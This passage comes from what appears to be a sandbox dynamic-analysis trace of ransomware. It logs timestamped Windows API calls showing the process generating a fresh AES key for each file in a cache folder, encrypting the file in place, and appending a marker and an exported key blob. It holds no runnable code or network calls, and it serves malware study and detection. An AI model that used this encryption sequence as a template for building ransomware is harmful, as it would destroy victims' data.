halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.949] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=342) returned 1 [0146.949] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=342) returned 1 [0146.949] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.949] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.950] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.950] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.950] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.950] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.950] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x156, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x156, lpOverlapped=0x0) returned 1 [0146.950] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.950] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x156, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x160) returned 1 [0146.950] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.951] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x160, lpOverlapped=0x0) returned 1 [0146.951] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.951] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.951] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.951] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.951] CloseHandle (hObject=0x198) returned 1 [0146.968] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.972] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.972] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.972] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.972] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.972] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", dwFileAttributes=0x80) returned 1 [0146.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.973] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=404) returned 1 [0146.973] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=404) returned 1 [0146.973] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.973] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.974] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.974] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.974] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.974] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.974] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x194, lpOverlapped=0x0) returned 1 [0146.974] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.974] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x194, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0146.974] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.974] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0146.974] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.975] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.975] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.975] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.975] CloseHandle (hObject=0x198) returned 1 [0147.002] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.006] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.006] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.007] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.007] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.007] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", dwFileAttributes=0x80) returned 1 [0147.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.007] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=390) returned 1 [0147.007] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=390) returned 1 [0147.008] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.008] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.008] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.008] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.008] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.008] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.009] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x186, lpOverlapped=0x0) returned 1 [0147.009] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.009] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x186, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0147.009] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.009] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0147.009] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.009] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.009] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.009] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.009] CloseHandle (hObject=0x198) returned 1 [0147.099] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.103] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.103] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.103] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.103] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.104] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", dwFileAttributes=0x80) returned 1 [0147.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.105] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=386) returned 1 [0147.105] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=386) returned 1 [0147.105] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.105] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.105] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.105] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.105] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.106] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.106] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x182, lpOverlapped=0x0) returned 1 [0147.106] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.106] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x182, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0147.106] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.106] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0147.106] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.106] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.106] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.106] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.106] CloseHandle (hObject=0x198) returned 1 [0147.124] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.129] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.129] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.129] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.129] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.129] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", dwFileAttributes=0x80) returned 1 [0147.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.130] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=386) returned 1 [0147.130] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=386) returned 1 [0147.130] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.130] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.130] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.130] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.130] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.131] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.131] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x182, lpOverlapped=0x0) returned 1 [0147.131] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.131] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x182, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0147.131] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.131] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0147.131] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.131] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.131] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.131] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.131] CloseHandle (hObject=0x198) returned 1 [0147.148] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.152] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.152] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.152] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.152] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.153] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", dwFileAttributes=0x80) returned 1 [0147.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.154] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=430) returned 1 [0147.154] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=430) returned 1 [0147.154] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.154] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.155] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.155] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.155] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.155] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.155] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1ae, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1ae, lpOverlapped=0x0) returned 1 [0147.155] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.155] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1ae, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1b0) returned 1 [0147.155] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.155] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1b0, lpOverlapped=0x0) returned 1 [0147.155] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, 